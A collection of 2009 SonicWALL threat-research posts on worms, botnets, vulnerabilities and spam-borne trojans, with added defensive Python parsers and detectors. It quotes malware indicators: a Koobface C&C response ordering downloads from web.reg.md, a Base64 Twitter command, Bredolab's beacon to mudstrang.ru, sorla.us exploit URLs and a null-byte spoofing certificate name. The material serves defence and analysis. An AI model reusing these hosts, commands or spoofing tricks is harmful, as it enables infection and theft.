Posts

Pink Floyd worm in 'Chinese Facebook' (Aug 25, 2009)

SonicWALL UTM Research team observed a new cross-site scripting worm in the wild. It is distributed within renren.com, a popular Chinese social network website.

Renren, which means “everyone” in Chinese, is China’s largest online community with more than 22 million active users; it is similar to Twitter or Facebook, as it allows users to share various information, including pictures and videos, with each other.

The worm itself is contained in JavaScript and is very similar to April’s Mike Mooney Twitter worm. This worm abuses the fact that users can point to Flash movies, coupled with a small flaw in the video player code used by the Renren.com site.

The worm masquerades as a Flash music video of Pink Floyd’s Wish You Were Here and spreads by exploiting a cross-site scripting hole. It contains a maliciously crafted Flash component loaded with an AllowScriptAccess="always" parameter.

By default, this parameter is set to "sameDomain", which means that a Flash object can only access the web page if the object was retrieved from the same domain. With the parameter set to "always", the Flash file can directly access any element of the page that embeds it, including cookies.

The Flash file is used to execute the JavaScript code present in the message body and to load a script called evil.js from an external domain. The domain hosting the JavaScript is registered to YanChun Liu in Henan province of China. The JavaScript code is used to exploit a cross-site scripting (XSS) flaw present in the website and spread the worm through its API.
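As an added illustration (not code from the SonicWALL post), the following Python script audits page markup for Flash objects that relax the default sameDomain policy by setting AllowScriptAccess to "always", which is the setting the worm relies on. The sample markup and the example.invalid URLs are constructed for this example; the classid is the well-known Flash ActiveX control identifier.

```python
from html.parser import HTMLParser

# Constructed sample markup (not taken from the post): the first object keeps the
# sameDomain policy, the second opts in to full script access with "always".
SAMPLE_HTML = """
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="320" height="240">
  <param name="movie" value="http://example.invalid/safe.swf">
  <param name="allowScriptAccess" value="sameDomain">
  <embed src="http://example.invalid/safe.swf" allowScriptAccess="sameDomain">
</object>
<object width="320" height="240">
  <param name="movie" value="http://example.invalid/video.swf">
  <param name="AllowScriptAccess" value="always">
  <embed src="http://example.invalid/video.swf" allowscriptaccess="always">
</object>
"""


class ScriptAccessAuditor(HTMLParser):
    """Records every <param> or <embed> that sets AllowScriptAccess to "always"."""

    def __init__(self):
        super().__init__()
        self.current_movie = None   # movie URL of the <object> currently open
        self.findings = []          # list of (where_found, movie_url)

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names; values keep their original case.
        attrs = {name: (value or "") for name, value in attrs}
        if tag == "object":
            self.current_movie = None
        elif tag == "param":
            name = attrs.get("name", "").lower()
            if name == "movie":
                self.current_movie = attrs.get("value", "")
            elif name == "allowscriptaccess" and attrs.get("value", "").lower() == "always":
                self.findings.append(("param", self.current_movie))
        elif tag == "embed":
            if attrs.get("allowscriptaccess", "").lower() == "always":
                self.findings.append(("embed", attrs.get("src", "")))


def find_script_access_always(html):
    """Return (where_found, movie_url) for each Flash embedding that uses "always"."""
    auditor = ScriptAccessAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for where, movie in find_script_access_always(SAMPLE_HTML):
        print(f"AllowScriptAccess=always via <{where}> for {movie}")
```

Both the `<param>` form (used by `<object>`) and the attribute form (used by `<embed>`) are checked, since a page can set the policy through either; an `<object>` whose `movie` param is missing is reported with `None` as the URL rather than skipped.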

There is a string “I’m not a malicious worm.” in the worm and, in fact, it doesn’t do anything other than spread.


There are also comments in the code that are lyrics from the song “Rose” by the German musician Maximilian Hecker.


This malware is also known as W32/PinkRen-A [Sophos], TrojanDownloader:SWF/Nerner.A [Microsoft], JS.Frienren [Symantec].

SonicWALL Gateway AntiVirus provides protection against this malware via Agent.EKC#Js (Trojan) and Agent.BE#Swf (Trojan) signatures.

Firebird SQL op_connect_request DoS (Aug 20, 2009)

Firebird is a relational database offering many ANSI SQL standard features that runs on Linux, Windows, and a variety of Unix platforms. It can be run under three different architectures: Classic Server, Embedded Server, and Superserver. In typical client/server environments Firebird runs as either Classic Server or Superserver. In Classic Server mode, Firebird creates a separate process for every client connection, each with its own cache. In Superserver mode, by contrast, Firebird executes as a single process serving all connections and uses threads to handle requests.

The Firebird database server listens on TCP port 3050. All messages transferred over this port follow the XDR (External Data Representation) specification, which defines a common data representation format for remote procedure calls, as shown below:

    Offset  Type      Size  Description
    ------  --------  ----  -----------
    0x0000  xdr_long  4     opcode
    0x0004  data      n     depends on the opcode

The content and length of the data field depend on the opcode. The opcode op_connect_request (0x00000035) has been observed to carry the following structure:

    Offset  Type       Size  Description
    ------  ---------  ----  -----------
    0x0000  xdr_long   4     opcode 0x35
    0x0004  xdr_short  2     p_req_type
    0x0006  xdr_short  2     p_req_object
    0x0008  xdr_long   4     p_req_partner

A denial of service vulnerability exists in the Firebird database server when it runs in Superserver mode. Specifically, the vulnerability is due to an exception handling error when processing op_connect_request (0x35) messages with an overly long data section. An attacker can exploit this issue by sending an op_connect_request message with an oversized data section, causing a denial of service of the Firebird database server. The affected service must be manually restarted.
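The following Python example is added here and is not SonicWALL's signature logic. It parses the generic Firebird message header and the op_connect_request layout exactly as the two tables above give them (the 2-byte xdr_short sizes are taken from those tables) and flags any op_connect_request whose data section runs past the documented 8 bytes, which is the condition the signature above targets. The sample messages are constructed for the example.

```python
import struct

OP_CONNECT_REQUEST = 0x35

# Data section of op_connect_request per the layout above:
# p_req_type (2) + p_req_object (2) + p_req_partner (4) = 8 bytes.
CONNECT_REQUEST_DATA_LEN = 8


def parse_message(buf):
    """Split one Firebird wire message into (opcode, data) using the generic layout."""
    if len(buf) < 4:
        raise ValueError("message shorter than the 4-byte opcode")
    (opcode,) = struct.unpack(">i", buf[:4])   # xdr_long: 32-bit big-endian
    return opcode, buf[4:]


def parse_connect_request(data):
    """Decode the documented fields of an op_connect_request data section."""
    if len(data) < CONNECT_REQUEST_DATA_LEN:
        raise ValueError("truncated op_connect_request")
    req_type, req_object, partner = struct.unpack(">hhi", data[:CONNECT_REQUEST_DATA_LEN])
    return {
        "p_req_type": req_type,
        "p_req_object": req_object,
        "p_req_partner": partner,
        # Anything beyond the documented fields is what the DoS relies on.
        "trailing_bytes": len(data) - CONNECT_REQUEST_DATA_LEN,
    }


def inspect_message(buf):
    """Classify a message as ('ok'|'alert'|'malformed'|'other', opcode, data_length)."""
    opcode, data = parse_message(buf)
    if opcode != OP_CONNECT_REQUEST:
        return "other", opcode, len(data)
    if len(data) < CONNECT_REQUEST_DATA_LEN:
        return "malformed", opcode, len(data)
    fields = parse_connect_request(data)
    if fields["trailing_bytes"] > 0:
        return "alert", opcode, len(data)
    return "ok", opcode, len(data)


# Constructed sample captures (not from the post): a well-formed request, one whose
# data section is padded far past the documented 8 bytes, and an unrelated opcode.
SAMPLE_NORMAL = struct.pack(">ihhi", OP_CONNECT_REQUEST, 1, 0, 0)
SAMPLE_OVERSIZED = SAMPLE_NORMAL + b"\x00" * 4096
SAMPLE_OTHER = struct.pack(">i", 0x01) + b"\x00" * 16

if __name__ == "__main__":
    for name, sample in (("normal", SAMPLE_NORMAL), ("oversized", SAMPLE_OVERSIZED), ("other", SAMPLE_OTHER)):
        verdict, opcode, length = inspect_message(sample)
        print(f"{name:9s} opcode=0x{opcode:02x} data_len={length:5d} -> {verdict}")
```

The threshold is derived purely from the documented layout, so a sensor built this way alerts on any op_connect_request carrying extra bytes; in production one would tune it against real client traffic before treating every trailing byte as hostile.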

SonicWALL UTM research team has released an IPS signature that will detect and block generic attack attempts addressing this issue. The IPS signature is listed below:

  • 4252 Firebird SQL op_connect_request DoS

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2009-2620.

New Botnet controlled via Twitter (Aug 18, 2009)

SonicWALL UTM Research team observed a new Botnet family that uses social networking services such as Twitter, Jaiku and Tumblr as its Command & Control (C&C) mechanism.

The status messages on these social blogging sites serve as C&C commands that contain links to download the malicious payload. The status messages are Base64 encoded.

An example Base64-encoded status message is shown below:

aHR0cDovL2JpdC5seS9HaHVVdSBodHRwOi8vYml0Lmx5L1FqC

decodes to

http://bit.ly/GhuUu -> http://rifers.org/paste/content/paste/9506/body [Malware payload]

One such account used for issuing C&C commands on these blogging sites is named upd4t3. Twitter, Jaiku, and Tumblr have already suspended the account in question, but there could be more such accounts.
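As an added example (not part of the post), this Python code applies the decoding step described above to the status text quoted. The quoted text is cut off after 49 characters, so the decoder drops the dangling final character before decoding; the recovered text holds two bit.ly links, the first of which is the one the post expands. The looks_like_base64 heuristic, its 16-character minimum and the scan_timeline helper are assumptions of this example.

```python
import base64
import binascii
import re

# Status text copied from the post above; it is cut off after 49 characters.
SAMPLE_STATUS = "aHR0cDovL2JpdC5seS9HaHVVdSBodHRwOi8vYml0Lmx5L1FqC"

# Heuristic (an assumption of this example): an unbroken run of Base64
# alphabet characters, at least 16 long, with optional '=' padding.
BASE64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
URL_PATTERN = re.compile(r"https?://[^\s\"'<>]+")


def looks_like_base64(text):
    return bool(BASE64_TOKEN.match(text.strip()))


def decode_lenient(text):
    """Decode Base64 that may lack padding or be truncated; None if undecodable."""
    token = text.strip().rstrip("=")
    remainder = len(token) % 4
    if remainder == 1:
        # One leftover character cannot encode a byte: a truncated message.
        token = token[:-1]
        remainder = 0
    if remainder:
        token += "=" * (4 - remainder)
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def extract_c2_urls(status_text):
    """URLs hidden in one status message, or [] if it is not an encoded command."""
    if not looks_like_base64(status_text):
        return []
    raw = decode_lenient(status_text)
    if raw is None:
        return []
    return URL_PATTERN.findall(raw.decode("ascii", errors="replace"))


def scan_timeline(statuses):
    """Return [(status, urls)] for every status that decodes to at least one URL."""
    hits = []
    for status in statuses:
        urls = extract_c2_urls(status)
        if urls:
            hits.append((status, urls))
    return hits


if __name__ == "__main__":
    # Constructed timeline: ordinary chatter plus the encoded command.
    timeline = ["having lunch, back in 20", SAMPLE_STATUS, "aGVsbG8gd29ybGQ="]
    for status, urls in scan_timeline(timeline):
        print(status, "->", urls)
```

Decoding alone is not a verdict: an innocuous status can also be Base64, so the URL extraction is what turns a decodable message into something worth following up (for instance by expanding the shortened links in a sandbox).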

This bot is packed using the MPRESS packer. It is also known as Trojan:Win32/Svelta.A [Microsoft], Trojan-Banker.Win32.Banker.alvx [Kaspersky], and W32/Bancos.MSB [Eset].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Suspicious#mpress (Worm), GAV: Suspicious#mpress.2 (Worm), and GAV: Agent.CMCF (Trojan) signatures.

[Screenshot: the Twitter C&C account]

[Screenshot: the Jaiku C&C account]

MS Workstation Service Vulnerability (Aug 13, 2009)

The Microsoft Windows Workstation service is a service introduced in Windows XP, Vista, Server 2003 and later versions. It is started to notify selected users and administrators of administrative alerts automatically. If this service is disabled, any services that explicitly depend on it will fail to start.

The Workstation Service is accessed through the DCE-RPC interface, and its numerous methods can be called by other processes through the Remote Procedure Call (RPC) interface (UUID: 6bffd098-a112-3610-9833-46c3f87e345a). The interface is accessible through several endpoints and transports, such as the “wkssvc” named pipe. After the interface is successfully bound over a transport, the client is allowed to call the provided RPC methods.
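To make the binding step concrete, the following Python code is an added example (not from the post or from Microsoft). It builds a minimal DCE-RPC bind PDU for the Workstation Service interface UUID quoted above and parses the abstract syntax back out of it, which is the check a network sensor performs to recognise that a connection is binding to wkssvc before it looks at individual method calls. The little-endian NDR field layout and the NDR transfer syntax UUID are standard DCE-RPC values; the interface version 1.0 and the placeholder UUID used for the negative case are assumptions of the example.

```python
import struct
import uuid

# Interface UUID quoted in the post above.
WKSSVC_UUID = uuid.UUID("6bffd098-a112-3610-9833-46c3f87e345a")
# Standard NDR 2.0 transfer syntax negotiated in a classic DCE-RPC bind.
NDR_TRANSFER_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
PTYPE_BIND = 11
HEADER_LEN = 16


def build_bind_pdu(interface, major=1, minor=0, call_id=1):
    """Construct a minimal little-endian DCE-RPC bind PDU for one interface."""
    ctx = struct.pack("<HBB", 0, 1, 0)                        # context id, 1 transfer syntax, pad
    ctx += interface.bytes_le + struct.pack("<HH", major, minor)   # abstract syntax + version
    ctx += NDR_TRANSFER_SYNTAX.bytes_le + struct.pack("<HH", 2, 0)
    body = struct.pack("<HHIB3x", 4280, 4280, 0, 1) + ctx     # max xmit/recv frag, assoc group, 1 item
    frag_len = HEADER_LEN + len(body)
    # rpc_vers=5, minor=0, ptype=bind, flags=first|last, drep=little-endian/ASCII
    header = struct.pack("<BBBBIHHI", 5, 0, PTYPE_BIND, 0x03, 0x00000010, frag_len, 0, call_id)
    return header + body


def parse_bind_interfaces(pdu):
    """Return [(interface UUID, (major, minor))] requested by a bind PDU; [] if not a bind."""
    if len(pdu) < HEADER_LEN + 12:
        raise ValueError("PDU shorter than a bind header")
    rpc_vers, _, ptype, _, drep, frag_len, _, _ = struct.unpack("<BBBBIHHI", pdu[:HEADER_LEN])
    if rpc_vers != 5 or ptype != PTYPE_BIND:
        return []
    if (drep & 0xF0) != 0x10:
        raise ValueError("only little-endian NDR is handled in this example")
    if frag_len > len(pdu):
        raise ValueError("frag_length exceeds captured bytes")
    _, _, _, num_ctx = struct.unpack_from("<HHIB", pdu, HEADER_LEN)
    offset = HEADER_LEN + 12
    interfaces = []
    for _ in range(num_ctx):
        if len(pdu) < offset + 24:
            raise ValueError("truncated presentation context item")
        _, num_syntaxes = struct.unpack_from("<HB", pdu, offset)
        offset += 4                                            # ctx id, count, pad
        iface = uuid.UUID(bytes_le=pdu[offset:offset + 16])    # mixed-endian UUID layout
        major, minor = struct.unpack_from("<HH", pdu, offset + 16)
        offset += 20 + 20 * num_syntaxes                       # skip the transfer syntaxes
        interfaces.append((iface, (major, minor)))
    return interfaces


def binds_to_wkssvc(pdu):
    return any(iface == WKSSVC_UUID for iface, _ in parse_bind_interfaces(pdu))


# Constructed samples: a bind to wkssvc and a bind to a placeholder interface.
PLACEHOLDER_UUID = uuid.UUID("11111111-2222-3333-4444-555555555555")
SAMPLE_WKSSVC_BIND = build_bind_pdu(WKSSVC_UUID)
SAMPLE_OTHER_BIND = build_bind_pdu(PLACEHOLDER_UUID)

if __name__ == "__main__":
    for iface, version in parse_bind_interfaces(SAMPLE_WKSSVC_BIND):
        print(f"bind to {iface} v{version[0]}.{version[1]} wkssvc={iface == WKSSVC_UUID}")
```

The detail most often got wrong when matching interface UUIDs on the wire is the byte order: with little-endian NDR the first three UUID fields are byte-swapped, which is why the parser uses `bytes_le` rather than comparing the textual UUID against raw bytes.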

The Workstation Service provides multiple methods through its RPC interface. The methods perform tasks such as user information queries, domain changes and additions among other things. A list of some of the supplied methods is shown below:

  • NetrGetJoinInformation
  • NetrJoinDomain2
  • NetrWkstaGetInfo
  • NetrWkstaSetInfo

The NetrGetJoinInformation method listed above is responsible for retrieving information about the workgroup or domain to which the specified computer is joined. According to the MSDN Windows API definition, the syntax of the NetrGetJoinInformation method is as follows:

    unsigned long NetrGetJoinInformation(
        [in, string, unique] WKSSVC_IMPERSONATE_HANDLE ServerName,
        [in, out, string] wchar_t** NameBuffer,
        [out] PNETSETUP_JOIN_STATUS BufferType
    );

A double free vulnerability exists in the vulnerable version of Microsoft Windows Workstation service. Specifically, the vulnerability is due to improper handling of the requests for the NetrGetJoinInformation method with a specially crafted NameBuffer value.

Remote authenticated attackers can exploit this vulnerability to inject and execute arbitrary code with the privileges of the affected service, which is SYSTEM by default.

SonicWALL UTM research team has released an IPS signature that will detect and block generic attack attempts addressing this issue. The IPS signature is listed below:

  • 4288 MS Windows Workstation Service Memory Corruption Attempt (MS09-041)

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2009-1544. Microsoft has addressed this vulnerability in its security bulletin MS09-041.

New Koobface worm variant (Aug 11, 2009)

SonicWALL UTM Research team found a new variant of the Koobface worm last week, on August 7, 2009. It is packed using UPX.

There are three major enhancements in this new variant of Koobface:

a) Earlier drive-by sites used a page that looked like a YouTube video page; they have now switched to a Facebook video look-alike page.

b) In the past, the message tweeted was “My home video 🙂 [URL]”; now they randomize it by adding “LOL”, “HA-HA-HA”, “OMFG!” etc., so each tweet is unique.

c) The link is also unique, with an appended random number, so after URL shortening it is still unique:
hxxp://uppinorr.se/pub1icm0vies/?[RANDOM] -> hxxp://bit.ly/[RANDOM]

The malware performs the following activities upon execution:

  • Deletes the original file that was downloaded and executed by the user
  • Drops the files (Windows)\ld12.exe and (Windows)\prxid93ps.dat and executes ld12.exe
  • Creates a registry entry to ensure that it starts on system reboot:
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: “c:\windows\ld12.exe”
  • Checks for Internet connectivity by sending a GET request to www.google.com
  • If the Internet is available, it connects to the C&C server located at upr0306.com and receives commands to download malicious files:

    #PID=1000
    STARTONCEIMG|http://web.reg.md/1/p.jpg
    STARTONCE|http://web.reg.md/1/prx.exe [Detected as GAV: FakeAv.OT_2 (Trojan)]
    START|http://web.reg.md/1/pp.10.exe [Detected as GAV: Koobface.NBH_5 (Worm)]
    #BLACKLABEL
    EXIT
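As an added example (not SonicWALL's code), this Python parser reads a response in the command format quoted above into directives and (verb, URL) commands, so an analyst can pull download URLs out of a captured C&C exchange without hand-copying them. The sample response is constructed with placeholder hostnames rather than the live URLs from the post; beyond treating every START* verb as a fetch instruction, the semantics of the verbs are not interpreted.

```python
# Constructed sample C&C response in the format quoted above; the hostnames are
# placeholders, not the live ones from the post.
SAMPLE_RESPONSE = """#PID=1000
STARTONCEIMG|http://cnc.example.invalid/1/p.jpg
STARTONCE|http://cnc.example.invalid/1/prx.exe
START|http://cnc.example.invalid/1/pp.10.exe
#BLACKLABEL
EXIT
"""

# Verbs seen in the quoted response; anything else is reported as unknown.
KNOWN_VERBS = {"STARTONCEIMG", "STARTONCE", "START", "EXIT"}


def parse_c2_response(text):
    """Split a response into ({directive: value_or_True}, [(verb, argument_or_None)]).

    Lines beginning with '#' are directives ('#PID=1000' -> PID: '1000',
    '#BLACKLABEL' -> BLACKLABEL: True); every other line is VERB|ARGUMENT.
    """
    directives = {}
    commands = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            key, sep, value = line[1:].partition("=")
            directives[key] = value if sep else True
            continue
        verb, sep, argument = line.partition("|")
        commands.append((verb, argument if sep else None))
    return directives, commands


def download_urls(commands):
    """URLs the bot is told to fetch: the argument of every START* command."""
    return [arg for verb, arg in commands if verb.startswith("START") and arg]


def unknown_verbs(commands):
    """Verbs not in KNOWN_VERBS, so a new variant's additions stand out."""
    return sorted({verb for verb, _ in commands if verb not in KNOWN_VERBS})


if __name__ == "__main__":
    directives, commands = parse_c2_response(SAMPLE_RESPONSE)
    print("directives:", directives)
    for url in download_urls(commands):
        print("fetch:", url)
    print("unknown verbs:", unknown_verbs(commands))
```

Keeping the verb list explicit pays off when the next variant appears: a response that parses cleanly but yields a non-empty unknown_verbs result is the first hint that the protocol has changed.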

This malware is also known as Worm:Win32/Koobface.gen!D [Microsoft], Net-Worm.Win32.Koobface.bgr [Kaspersky], Mal/KoobHeur-A [Sophos].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Koobface.BGR (Worm) signature.

Screenshots of the Koobface worm drive-by sites in action:

[Screenshot: Facebook video page look-alike]

[Screenshot: download of the Koobface worm when the user attempts to download Flash Player]

[Screenshot: page showing unique tweets with the shortened malicious link]

MS IE Stylesheet Memory Corruption (Aug 7, 2009)

Microsoft Internet Explorer provides web developers with the ability to dynamically modify and style a web page via the Document Object Model (DOM) and Cascading Style Sheets (CSS). The Document Object Model is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. The browser supports both the JavaScript and JScript scripting languages. JScript can be used to access and modify a web page’s underlying DOM structure. The appearance of a page is mainly manipulated through CSS, which is used to define the aesthetic aspects of a web page such as fonts, colors and spacing.

Styles are defined and stored either inline or within external style sheets. The following example code snippet illustrates the use of an inline style definition:

    p { color: red; }

In the above example, a single rule is defined for the paragraph HTML element. Internet Explorer is instructed to style all text within the p tag with the color red. JScript is capable of accessing the stylesheets within a web page using the DOM property document.styleSheets. This property is a collection of styleSheet objects, which can contain zero or more CSS rules. The property can be used to delete or modify existing CSS rules. An example of its usage is shown:

    var testStyle = document.styleSheets[3].rules[0].style;

The above code creates a reference to a CSS rule’s style object, which contains methods and attributes related to that style. This reference can then be used to modify the style definition for the associated CSS rule. Internet Explorer exposes an additional styleSheet property, cssText, which can be used to set or retrieve the text representation of the CSS rules. An example of the usage of this property is shown:

    document.styleSheets[1].cssText = "p { color: green; }";

A memory corruption vulnerability exists in Microsoft Internet Explorer. It is caused by a design error in the way the browser accesses an object that has been deleted. When the cssText property of a styleSheet is assigned a new value, as shown in the last example code snippet, the browser does not properly clean up the previous underlying style object that the new assignment replaces. A JScript reference to that style object will remain valid from the script’s point of view even after the cssText reassignment.

A remote attacker can exploit this vulnerability by enticing target users to visit a crafted web page that references and attempts to use a style object left in memory after a cssText reassignment. This can potentially cause memory corruption, overwriting critical memory, and allow for the injection and execution of arbitrary code.

Successful exploitation may result in code execution with the privileges of the logged in user. Exploitation of this vulnerability resulting in code execution is not considered to be a trivial task. Upon unsuccessful exploitation, the affected browser may terminate as a result of an invalid memory access.

SonicWall has developed and released an IPS signature that detects and blocks a specific exploit targeting this vulnerability. Generic detection of attack attempts is not feasible as it would require logical analysis of all script contained within a given web site. The IPS signature released to address this vulnerability is:

  • 4236 – MS IE Stylesheet Memory Corruption PoC (MS09-034)

The vulnerability has been assigned CVE-2009-1919 by Mitre.org. The vendor has released a security bulletin to address this flaw.

UPS Invoice spam – Bredolab.X Trojan (Aug 5, 2009)

SonicWALL UTM Research team observed a new wave of the UPS invoice spam campaign starting this morning. The e-mail has a zip-archived attachment which contains the new Bredolab Trojan variant.

SonicWALL has received more than 4,000 e-mail copies of this malware so far. The e-mail looks like:

Attachment:

  • UPSNR_7a04d392.zip (contains UPSNR_7a04d392.exe)
  • UPSNR_05fa2628.zip (contains UPSNR_05fa2628.exe)
  • UPSNR_8d1cb9a4.zip (contains UPSNR_8d1cb9a4.exe)

Subject: UPS Tracking Number [7-digit alpha-numeric number]

Email Body:
————————
Dear customer!

We were not able to deliver postal package you have sent on the 9th of July in time because the addressee’s address is erroneous.
Please print out the invoice copy attached and collect the package at our department.

Your United Parcel Service of America
————————

[Screenshot: the e-mail message]

The executable file inside the zip attachment has an icon disguised as a Microsoft Excel spreadsheet file:

[Screenshot: the disguised executable icon]

The Trojan, when executed, performs the following host-level activity:

  • Drops a copy of itself as (Windows System Folder)Startupdfqupd32.exe
  • Deletes the original file

It tries to connect to the mudstrang.ru domain and downloads an encrypted configuration file via the following HTTP request:

  • GET /def/controller.php?action=bot&entity_list=&uid=&first=1&guid=615903122&v=15&rnd=8520045

The Trojan is also known as Mal/Bredo-A [Sophos] and TR/Crypt.ZPACK.Gen [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via the GAV: Bredolab.X (Trojan) signature [4,379,258 hits recorded starting August 5, 2009].


New Variants of Fake Anti-Virus Software (Aug 5, 2009)


Rogue anti-virus software comes in many different names, some of which are Antivirus Plus, Advanced Virus Remover, Secret Service, Antivirus Agent Pro, etc. However, their behavior is very similar.

Once installed, the rogue software starts to scan the user’s system immediately. After the scan, reports of non-existent threats are presented to the user as a scare tactic.

The reports usually contain many fake high risk infections that trigger the user to click the “remove threats” button on the anti-virus window. When this button is clicked, the user gets license or registration errors.

The user is forced to buy the software in order to remove the malware on the system. The licenses are sold on a website that is opened up when the user clicks the “get license” button. The websites usually offer huge discounts, lifetime support, money back guarantee, etc.

SonicWALL is blocking the 4 variants mentioned above with these signatures: GAV: SecretService_2 (Trojan), GAV: AntiVirusAgentPro (Adware), GAV: AdvancedVirusRemover.A_3 (Adware), GAV: AntiVirusPlus.KV (Trojan).

[Screenshots: main windows of two fake AV programs]

[Screenshots: fake AV reports of non-existent threats]

[Screenshots: fake AV license purchase prompts]

SonicWALL UTM Research team is proactively scanning domains that host fake anti-virus variants. We create signatures for each variant we find.

[Screenshots: hit statistics for some of those signatures]

SSL Certificate Null Byte Poisoning (July 31, 2009)

Multiple browsers are theoretically prone to a security-bypass vulnerability. The problem is due to improper validation of the domain name in a signed Certificate Authority (CA) certificate. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks.

Dan Kaminsky and Moxie Marlinspike, working separately, discovered the same vulnerability, which affects many SSL implementations. Basically, when the vulnerable browsers check the domain name contained in the attacker’s certificate, they stop reading at the first null byte (\x00, or \0) and ignore any characters that follow it. The vulnerability has been assigned CVE-2009-2408.

The whole trick is to get a CA to sign a certificate for a subdomain containing a null byte. An example would be paypal.com\0.malicious.com, where “paypal.com” is the subdomain and “\0” is the null byte. Firefox and other browsers theoretically can be fooled into reading this certificate as if it were coming from PayPal’s web site. This allows the attacker to steal the victim’s PayPal credentials.

To solve this problem, both CAs and browser developers have to take action. CAs must stop issuing certificates that contain a null byte. (VeriSign, one of the largest CAs, claims that “No certificates under the VeriSign brand or sub-brands have a domain containing a null character”.) Meanwhile, in order to prevent attacks using existing CA-signed certificates or self-signed certificates (which contain a null byte in the subdomain), browser developers have to fix their SSL implementations and continue reading the domain name when a null byte is encountered.
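The following Python code is an added example (not from the post) that puts the vulnerable and the corrected name check side by side: match_hostname_truncating mimics a comparison that stops at the first null byte, while match_hostname_strict rejects any name containing a null byte and compares the whole string, which is the browser-side fix described above. The crafted common name is the one from the paragraph above; the single-label wildcard handling in the helper is a simplification assumed for the example.

```python
def _names_equal(pattern, hostname):
    """Case-insensitive label-by-label match; '*' is allowed only as the whole left-most label."""
    p_labels = pattern.lower().rstrip(".").split(".")
    h_labels = hostname.lower().rstrip(".").split(".")
    if len(p_labels) != len(h_labels) or len(p_labels) < 2:
        return False
    if p_labels[0] == "*":
        return p_labels[1:] == h_labels[1:]
    return p_labels == h_labels


def match_hostname_truncating(cert_name, hostname):
    """Vulnerable behaviour: everything after the first NUL is silently ignored,
    as a C-string comparison would do."""
    effective = cert_name.split("\x00", 1)[0]
    return _names_equal(effective, hostname)


def match_hostname_strict(cert_name, hostname):
    """Hardened: a NUL can never appear in a DNS name, so its presence fails the
    check outright, and the full name is compared otherwise."""
    if "\x00" in cert_name:
        return False
    return _names_equal(cert_name, hostname)


def verify_name(cert_name, hostname, strict=True):
    """Convenience wrapper used by the demonstration below."""
    check = match_hostname_strict if strict else match_hostname_truncating
    return check(cert_name, hostname)


# The name from the paragraph above: what a CA validating ownership of
# malicious.com would have seen as a subdomain label containing a NUL.
CRAFTED_CN = "paypal.com\x00.malicious.com"

if __name__ == "__main__":
    for cn, host in ((CRAFTED_CN, "paypal.com"), ("www.paypal.com", "www.paypal.com"),
                     ("*.paypal.com", "login.paypal.com")):
        print(f"{cn!r:40} vs {host:20} truncating={verify_name(cn, host, strict=False)!s:5} "
              f"strict={verify_name(cn, host)}")
```

The fix is deliberately a rejection rather than "keep reading past the NUL": a name that a CA validated under one owner and that a client would read as another is not salvageable by any comparison rule, so the only safe outcome is to fail the handshake.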

SonicWALL has released an IPS signature that will detect and prevent attacks targeting this vulnerability. The signature to address this vulnerability is:

  • 1266 SSL Server Certificate Null Byte Poisoning Exploit

Adobe Flash 0-day exploit (July 22, 2009)

SonicWALL UTM Research team found reports of a new 0-day vulnerability (CVE-2009-1862) in Adobe Flash Player v9 and v10 being exploited in the wild via malicious drive-by sites.

The exploit is being actively served in the wild via the following URL, which was found injected into pages of infected websites:

  • sorla.us/(REMOVED)x/mail.asp

The above page will only load with a valid Referer field containing the URL of one of the infected pages. The active server page contains a script that identifies the user’s browser environment and, based on that, loads one of the following pages:

  • If the browser is not Internet Explorer, iframe URL: sorla.us/(REMOVED)x/ff.html
  • If the browser is Internet Explorer and has the Flash ActiveX control installed, iframe URL: sorla.us/(REMOVED)x/ie.html
  • If the browser is Internet Explorer and the script cannot create a valid Flash ActiveX object, iframe URL: sorla.us/(REMOVED)x/mpg.html

[Screenshot: the browser-detection code snippet]

In the first two cases, ff.html and ie.html contain JavaScript to download and run a malicious Shockwave Flash file that exploits the 0-day vulnerability in Adobe Flash Player:

  • sorla.us/(REMOVED)x/xp.swf [Detected as GAV: Pidief_2 (Exploit)]

It also downloads an XOR-encoded backdoor Trojan executable from the following URL:

  • sorla.us/(REMOVED)x/xor.gif [Detected as GAV: Agent.ROX (Trojan)]

[Screenshot: the 0-day exploit in action, crashing the Flash Player object and the browser]

In the third case, the mpg.html page contains JavaScript that further checks for the presence of specific host AntiVirus software from Kaspersky and McAfee. If the AntiVirus software is not present, it tries to exploit the Microsoft DirectShow Msvidctl vulnerability.

[Screenshot: the AntiVirus presence-detection code snippet]

SonicWALL Gateway AntiVirus provides protection against this threat via GAV: Pidief (Exploit), GAV: Pidief_2 (Exploit), GAV: Pidief_3 (Exploit) and GAV: Agent.ROX (Trojan) signatures.